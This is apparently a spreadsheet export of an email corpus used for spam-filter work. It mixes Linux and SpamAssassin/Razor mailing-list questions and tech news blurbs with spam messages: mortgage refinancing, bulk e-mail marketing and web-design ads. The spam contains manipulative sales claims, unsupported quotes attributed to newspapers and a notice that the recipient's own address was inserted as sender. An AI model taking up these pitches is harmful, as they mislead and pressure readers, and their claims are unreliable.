     &lt;td valign="top"&gt;&amp;nbsp;&lt;/td&gt;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sans-serif"&gt;Southeast&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Carmen DiMartino &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" colspan="2" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;A href="mailto:cdimartino@cusa.canon.com" &gt;(cdimartino@cusa.canon.com)&lt;/A&gt; 
       &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Alabama&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;North Carolina&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Puerto Rico&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;West Virginia&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Florida&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;South Carolina&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Virginia&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Georgia&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Pennsylvania&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Virgin Islands&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;/font&gt;&lt;/td&gt;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bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Southwest&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Heath Tagtmeyer &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td valign="top" colspan="2" bgcolor="#d4dfff"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;A href="mailto:htagtmeyer@cusa.canon.com" &gt;(htagtmeyer@cusa.canon.com)&lt;/A&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Arizona&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Hawaii&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Oregon&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;California&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Nevada&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td valign="top"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top" colspan="4"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;i&gt;
     If you wish to opt out of receiving future e-mail blasts, please &lt;a href="#"&gt;click here&lt;/a&gt;. If you would like additional recipients to receive our monthly communications, send additional names and e-mail addresses to &lt;A href="mailto:canonresellers@cits.canon.com"&gt;canonresellers@cits.canon.com&lt;/A&gt;.
     &lt;/i&gt;&lt;/font&gt;
     &lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;!-- ### /promo content ### --&gt;
 &lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table width="624"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width="624"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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org'&gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;p&gt;
 &lt;A NOTRACK HREF="http://clickthru.online.com/Click?q=a5-DyfHrzZqSQXorbLmIMk61qDcw2kfasRR"&gt;Unsubscribe&lt;/A&gt;&amp;nbsp|&amp;nbsp&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://www.cnet.com/subscription/0-16335-7-6770019.html"&gt;FAQ&lt;/A&gt;
 &amp;nbsp|&amp;nbsp&lt;a href="http://www.cnet.com/aboutcnet/0-13618.html?tag=ft"&gt;Advertise&lt;/A&gt;&lt;br&gt;&lt;/font&gt;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width="624"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width="624" bgcolor="#ffcc00" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="37"&gt;&lt;a href="http://www.cnet.com/frontdoor/0-1.html"&gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://shopper.cnet.com/shopping/0-1257.html"&gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; | 
 &lt;a href="http://computers.cnet.com/hardware/0-1016.html"&gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; | 
 &lt;a href="http://news.cnet.com/"&gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://download.cnet.com/downloads/0-10000.html"&gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; | 
 &lt;a href="http://www.cnet.com/sitemap/0-2253447.html"&gt;&lt;font color="#000000"&gt;All CNET services&lt;/font&gt;&lt;/a&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="624" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td height="25"&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;tr:ad name="copyright"/&gt;
 &lt;/a&gt;.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=ba-m-95-hpITW8NcktOu5LdlZB0PRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Radio gives mighty roar to quiet cars
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8106968,1440/
 Date: Not supplied
 A patented system allows drivers of hushed modern vehicles to enjoy the throaty 
 engine sounds of classic cars, all in synch with your driving
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Mortgage Rates Have Never Been Lower
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_1201_65472431353854800184200
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 We will help you get the mortgage loan you want! 
 Only takes 2 minutes to fill out our form. 
 http://xnet.123alias.com/index.php
 Whether a new home loan is what you seek or to refinance your current home =
 loan
 at a lower interest rate and payment, we can help!
 Mortgage rates haven't been this low in the last 12 months, take action now!
 Refinance your home with us and include all of those pesky credit card bills =
 or
 use the extra cash for that pool you've always wanted... 
 Where others says NO, we say YES!!!
 Even if you have been turned down elsewhere, we can help! 
 Easy terms! Our mortgage referral service combines the
 highest quality loans with most economical rates and the easiest =
 qualification!
 Click Here to fill out our form. 
 http://xnet.123alias.com/index.php
 ------=_NextPart_1201_65472431353854800184200
 Content-Type: text/html;
 	charset=iso-8859-1
 Content-Transfer-Encoding: Quoted-Printable
 &lt;!doctype html public "-//w3c//dtd html 4.0 transitional//en"&gt;
 &lt;html&gt;
 &lt;head&gt;
    &lt;meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; U) =
 [Netscape]"&gt;
    &lt;title&gt;Get the perfect mortgage fast. It's simple.&lt;/title&gt;
 &lt;/head&gt;
 &lt;body text=3D"#000000" bgcolor=3D"#FFFFFF"&gt;
 &lt;center&gt;&lt;table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 WIDTH=3D"535"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img SRC=3D"http://xnet.123alias.com/images/headline.gif" NOSAVE height=3D24 =
 width=3D384&gt;
 &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font size=3D-1&gt;We can help
 find the perfect mortgage for you. Just click on the option below that
 best meets your needs:&lt;/font&gt;&lt;/font&gt;
 &lt;center&gt;&lt;table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 WIDTH=3D"535" &gt;
 &lt;caption&gt;&amp;nbsp;&lt;/caption&gt;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
 php"&gt;Refinance
 your existing mortgage&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;i&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#666666"&gt;&lt;font =
 size=3D+0&gt;lower
 your payments&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/td&gt;
 &lt;td ALIGN=3DLEFT VALIGN=3DCENTER ROWSPAN=3D"4" WIDTH=3D"225"&gt;&lt;img SRC=3D"http://xnet.=
 123alias.com/images/mort_house_image2.jpg" NOSAVE height=3D122 width=3D196&gt;&lt;/td&gt;
 &lt;/tr&gt;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
 php"&gt;Consolidate
 your debt&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;i&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#666666"&gt;&lt;font =
 size=3D+0&gt;simplify
 your life&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/td&gt;
 &lt;/tr&gt;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href=3D"http://xnet.123alias.com/index.php"&gt;Home
 Equity financing&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;i&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#666666"&gt;&lt;font =
 size=3D+0&gt;get
 extra cash&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/td&gt;
 &lt;/tr&gt;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
 php"&gt;Purchase
 a home&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;i&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#666666"&gt;&lt;font =
 size=3D+0&gt;there's
 never been a better time&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td ALIGN=3DCENTER VALIGN=3DTOP WIDTH=3D"60"&gt;&lt;img SRC=3D"http://xnet.123alias.=
 com/images/spacer.gif" height=3D10 width=3D60&gt;&lt;/td&gt;
 &lt;td ALIGN=3DLEFT VALIGN=3DTOP WIDTH=3D"250"&gt;&lt;img SRC=3D"http://xnet.123alias.=
 com/images/spacer.gif" height=3D10 width=3D250&gt;&lt;/td&gt;
 &lt;td ALIGN=3DLEFT VALIGN=3DCENTER WIDTH=3D"225"&gt;&lt;img SRC=3D"http://xnet.123alias.=
 com/images/spacer.gif" height=3D10 width=3D225&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font size=3D-1&gt;&lt;b&gt;Here's how it
 works... &lt;/b&gt;After completing a short form, we will automatically sort
 through our database of over 2700 lenders to find the ones most qualified
 to meet your needs. Up to three lenders will then contact you and compete
 for your business. The search is &lt;b&gt;free&lt;/b&gt; and &lt;b&gt;there's no obligation
 to continue.&lt;/b&gt; It's that easy, so &lt;b&gt;&lt;a href=3D"http://xnet.123alias.=
 com/index.php"&gt;click
 here&lt;/a&gt;&lt;/b&gt; to get started now!&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;center&gt;
 &lt;hr WIDTH=3D"540"&gt;&lt;/center&gt;
 &lt;center&gt;&lt;table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 COLS=3D1 WIDTH=3D"540" &gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;center&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D-2&gt;&lt;font =
 color=3D"#000000"&gt;This
 email was sent to you via Saf-E Mail Systems.&amp;nbsp; Your email address
 was automatically inserted into the To and From addresses to eliminate
 undeliverables which waste bandwidth and cause internet congestion. Your
 email or webserver &lt;b&gt;IS NOT &lt;/b&gt;being used for the sending of this mail.
 No-one else is receiving emails from your address. You may utilize the
 removal link below if you do not wish to receive this mailing. &lt;/font&gt;
 &lt;br&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D-2&gt;&amp;nbsp;&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;b&gt;Please &lt;a href=3D"http://xnet.123alias.com/remove.html"&gt;Remove =
 Me&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D-2&gt;&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font color=3D"#000000"&gt;&lt;font size=3D-2&gt;Saf-E =
 Mail Systems, PO Box 116-3015 San Rafael de Heredia, =
 CR&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/center&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_1201_65472431353854800184200--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Glennf responds to warchalking FUD
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85528553
 Date: Not supplied
 Glenn Fleishman's written an open letter to the Infoworld writer who published 
 an hysterical ambivalent article[1] about warchalking: 
     The only place I hear about these stories on warchalking that relate to 
     stealing access from open, but not shared APs -- accidentally shared, I 
     suppose is accurate -- is via law enforcement without any specific 
     locations mentioned, arrests made, or even photos of the offending marks.  
 Link[2] Discuss[3]
 [1] http://www.infoworld.com/articles/op/xml/02/10/04/021004opethics.xml?s=rss&amp;t=wireless&amp;slot=3
 [2] http://80211b.weblogger.com/2002/10/04
 [3] http://www.quicktopic.com/boing/H/RkUMBVBT8A3
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Lowest life insurance rates available!                                                   moode
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Act Now - Reach Hundreds of Prospects
</t>
  </si>
  <si>
    <t xml:space="preserve">_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/
  S   P   E   C   I   A   L         R   E   P   O   R   T  
 How To Reliably Generate Hundreds Of Leads And Prospects
 Every Week!
 _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/
 Our research has found that many online entrepreneurs have
 tried one or more of the following...
     Free Classifieds? (Don't work anymore)
     Web Site? (Takes thousands of surfers)
     Banners? (Expensive and losing their punch)
     E-Zine? (Hope they have a -huge- subscriber list)
     Search Engines? (Forget it, unless you're in the top 10)
          S O   W H A T   D O E S   W O R K ?
 Although often misunderstood, there is one method that has
 proven to succeed time-after-time.
          E - M A I L   M A R K E T I N G ! !
 Does the thought of $50,000 to $151,200.00 per year make you
 tingle with excitement?  Many of our customers make that and 
 more... Click here to find out how:
 &lt;a href="http://32.97.166.75/seinet.veri321/"&gt;
 http://http://32.97.166.75/seinet.veri321/ &lt;/a&gt;
 HERE'S WHAT THE EXPERTS HAVE TO SAY ABOUT E-MAIL MARKETING:
 "A gold mine for those who can take advantage of
 bulk e-mail programs" - The New York Times
 "E-mail is an incredible lead generation tool"
 - Crains Magazine
 Click here to find out how YOU can do it:
 &lt;a href="http://32.97.166.75/seinet.veri321/"&gt;
 http://http://32.97.166.75/seinet.veri321/ &lt;/a&gt;
 ==========================================================
 If you no longer wish to hear about future
 offers from us, send us a message with STOP
 in the subject line, by clicking here:
 mailto:list6644@postino.ch?Subject=Stop
 Please do not include any correspondence in your
 message to this automatic stop robot--it will
 not be read. All requests processed automatically.
 **********************************************************
  [7(^(PO1:KJ)_8J7BJK9^":}H&amp;*T]
</t>
  </si>
  <si>
    <t xml:space="preserve">About apt.conf there are these lines:
 --&lt;snip&gt;--
 RPM 
 {
    // Leave list empty to disable
    AllowedDupPkgs {"^kernel$"; "kernel-smp"; "kernel-enterprise"; };
    HoldPkgs {"kernel-source"; "kernel-headers"; };
 }
 --&lt;/snip&gt;--
 How do I tell apt hold all kernel packages? Can I use syntax like 
 "kernel*"; ? 
 And I don't quite understand what the part "^kernel$"; means?
 -- 
 Peter
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 23, 2002 at 06:06:05PM -0400,
 Scott Henderson &lt;boyhowdy@cyberspace.org&gt; is thought to have said:
 &gt; Thanks, Tabor.  How do I install v1 over v2, and where does one
 &gt; get it?  (I don't see it at razor.sourceforge.net)
 It's there. Scroll down on the downloads page. However you might
 consider going the other way and installing SpamAssassin's 2.40
 bleeding-edge code as Razor v2 has a lot of nice features over v1.
 -- 
 --------------------------------------------------------------------
 Tabor J. Wells                                razor-users@fsckit.net
 Fsck It!                 Just another victim of the ambient morality
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Extended Auto Warranties Here iubrq
</t>
  </si>
  <si>
    <t xml:space="preserve">On Aug 23 Bort, Paul wrote:
 &gt;If your sendmail has been compiled with Milter support, you can add SMRazor
 &gt;easily. We've been using it for a while without problems. Others on the list
 &gt;have mentioned it as well. 
 &gt;
 &gt;http://www.sapros.com/smrazor/
 Does this fork+exec a perl interpreter for every incoming mail? If so, I 
 reckon your mailer is vulerable to a DoS attack without too much effort...
 The real question is: is there a way to run razor without this overhead?  
 Even some sort of razord you could talk to over a unix socket would do.
 Until I can find one, I cannot spare the resources to run razor at all :(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</si>
  <si>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[SAdev] spamc load balancing to multiple spamd
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I have searched the list but did not find any info on this. 
 How do I setup multiple spamd machines so that spamc load balances - or 
 anything similar? 
 Duane.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</si>
  <si>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[Razor-users] can't find Razor/Client.pm
</t>
  </si>
  <si>
    <t xml:space="preserve">Apologies if this has been answered before on this list.  I can't
 find a way to search the archives.  I did my best to scan through
 the archive messages, but can't find my answer.  Please advise if
 there is a search engine somewhere, Thanks. 
 I'm trying to set up a smtp relay mail server using postfix,
 Spamassassin, and amavisd-new.  (no local delivery, just an
 anti-spam filter box)  I have installed razor-agents-sdk-2.02 and
 razor-agents-2.125 (in that order) on a RH 7.3 box for this.  But
 when I try to load amavisd from the command line (as root), I get
 errors with:  
 Can't locate Razor/Client.pm in @INC.  But the machine does have
 a Client.pm on it, in fact, several, at:
 /usr/lib/perl5/5.6.1/Client.pm
 /usr/lib/perl5/site_perl/5.6.1/WAIT/Client.pm
 /usr/lib/perl5/site_perl/5.6.1/Client.pm
 /usr/lib/perl5/vendor_perl/5.6.1/Frontier/Client.pm.rawcall
 /usr/lib/perl5/vendor_perl/5.6.1/Frontier/Client.pm
 What am I missing?  Thanks!
 Scott
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-09-26
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 Using Web Services with Perl and AppleScript
     posted by pudge on Wednesday September 25, @08:12 (links)
     http://use.perl.org/article.pl?sid=02/09/25/129231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</si>
  <si>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&gt;
 &gt; Hit or miss, Groundhog Day 2019 is going to be one heck of a show. Book
 &gt; early, avoid the rush.
 Hey, meybee by then, Bush's grand plan for a missle defense system will
 actually pan out and -work- ...
 I'm not holding my breath, but i'm not going to panic for something thats
 a little under 17 years away, either.
 -c
 &gt;
 &gt; --
 &gt; Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications
 &gt; Inc Business Innovations Through Open Source Systems:
 &gt; http://www.teledyn.com "Computers are useless.  They can only give you
 &gt; answers."(Pablo Picasso)
 &gt;
 &gt; http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Tags reveal if frozen food is rotten
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8605373,1440/
 Date: Not supplied
 Plastic discs designed to sit inside food packaging and change colour when the 
 contents go off could provide warnings to consumers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Apt repository authentication: it's time
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Brian wrote :
 &gt;      OK, it's now time to work out the PGP securing of apt repository
 &gt;      traffic. I've never gotten anything but "sitename.whatever will not
 &gt;      be authenticated" until running Redhat 8.0 when I get something
 &gt;      about having "No Key" for various files.
 I don't think gpg signing my repositories will help anything, as it will
 just ensure that my passphrase was typed to confirm the md5 signatures of
 all pgklists and srclists. Basically, you'll then just be sure that it's me
 who generated the files, and this will of course prevent automating the
 process of updating the apt repository when Red Hat updates show up.
 In Red Hat Linux 8.0 though, the warnings about "No Key" appear until you
 import the right gpg public keys directly with rpm, for example :
 rpm --import /usr/share/doc/apt-0.5.4cnc7/RPM-GPG-KEY
 (this will import my key, which is used to sign all freshrpms.net packages)
 Hopefully it is possible to the tell rpm to install *only* packages who
 verify against an imported gpg key? This for me would be the optimal way to
 ensure integrity with the way things curently work.
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.14 0.18 0.17
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get Your Own Great-Looking Website
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multipart MIME message.
 --= Multipart Boundary 0731021742
 Content-Type: text/plain;
 	charset="ISO-8859-1"
 Content-Transfer-Encoding: 8bit
 -
 NEED A PROFESSIONAL LOOKING  WEBSITE?
 Custom Website Development
 We can create new web pages or give your existing pages a "face-lift" to bring them up to the Internet's latest trends and standards.  We are experienced at writing HTML and can provide custom programming in CGI, JavaScripts, Java Server Pages, Active Server Pages and ActiveX, which we can use to give your site the dynamics and interactivity of a cutting edge web presence.
 E-Mail and Web Hosting
 &gt;Unlimited technical customer support via e-mail
 &gt;Web hosting- 50MB storage
 &gt;10 e-mail accounts
 &gt;Unlimited e-mail forwards
 For $29.95 monthly.
 First month Free with purchase of new website!!
 &gt;&gt;From server setup to content development, we offer the complete Web solution, which is further enhanced by the services of our carefully chosen strategic partners who provide everything from development tools to hosting services.
 If you prefer not to receive future news and information on our technology solutions, please reply to this message with UNSUBSCRIBE in the subject.
 2200 N.W. 102nd Ave. Suite 4 
 Miami, FL 33172
 Tel: +1 (305) 594-3474  
 Fax: +1 (305) 594-9655
 Toll Free: 1-888-8-COM-PRO
 Web: www.comprosys.com
 e-mail: info@comprosys.com
 Web Templates
 Starting from just $499! 
 $399 If your order is placed by 8/15/2002.
 Our Web templates give you the way to get on the Internet with a very professional look and feel while keeping the costs down. Contact us for your options.
 How does it work? Easy as 1-2-3...
 1) Register on our site and select a username and password, this will allow you to track your website development project start to finish.
 2) Fill out the questionnaire, this will help you to get all the materials needed for us to develop your site. It is very important to fill out all the questions.
 3) We will then setup your website according to the information given to us. That's it !
 If you would prefer a custom solution we will be happy to create a completely custom solution for you. Contact us for a free quote.
 Sell Your Products On-Line
